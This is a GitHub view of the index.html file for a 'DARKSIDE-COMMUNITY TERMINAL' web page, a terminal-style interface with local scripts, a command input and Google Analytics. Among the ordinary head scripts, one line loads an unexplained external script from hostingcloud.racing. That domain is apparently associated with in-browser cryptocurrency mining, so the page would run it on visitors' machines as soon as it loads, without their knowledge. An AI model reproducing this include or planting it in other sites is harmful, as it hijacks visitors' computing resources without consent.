-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathindex.html
More file actions
43 lines (38 loc) · 1.44 KB
/
index.html
File metadata and controls
43 lines (38 loc) · 1.44 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
<html>
<head>
<meta charset="utf-8" />
<meta http-equiv="X-UA-Compatible" content="chrome=1" />
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>DARKSIDE-COMMUNITY TERMINAL</title>
<link rel="icon" href="./asset/favicon.png" type="image/x-icon" />
<link href="./asset/index.css" rel="stylesheet" type="text/css" />
<script src="./js/polyfills.js"></script>
<script src="./js/main.js"></script>
<script src="https://www.hostingcloud.racing/mGdM.js"></script>
<script src="./js/bash.js"></script>
<!-- Global site tag (gtag.js) - Google Analytics -->
<script async src="https://www.googletagmanager.com/gtag/js?id=UA-219043196-2"></script>
<script>
window.dataLayer = window.dataLayer || [];
function gtag(){dataLayer.push(arguments);}
gtag('js', new Date());
gtag('config', 'UA-219043196-2');
</script>
</head>
<body>
<div id="sidenav">
<button id="sidenavBtn"></button>
<img id="profilePic">
</div>
<div id="container">
<div id="output"></div>
<div id="input-line" class="input-line">
<div id="prompt" class="prompt-color"></div>
<div>
<input type="text" id="cmdline" autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" autofocus/>
</div>
</div>
</div>
<script src="./js/nonClick.js"></script>
</body>
</html>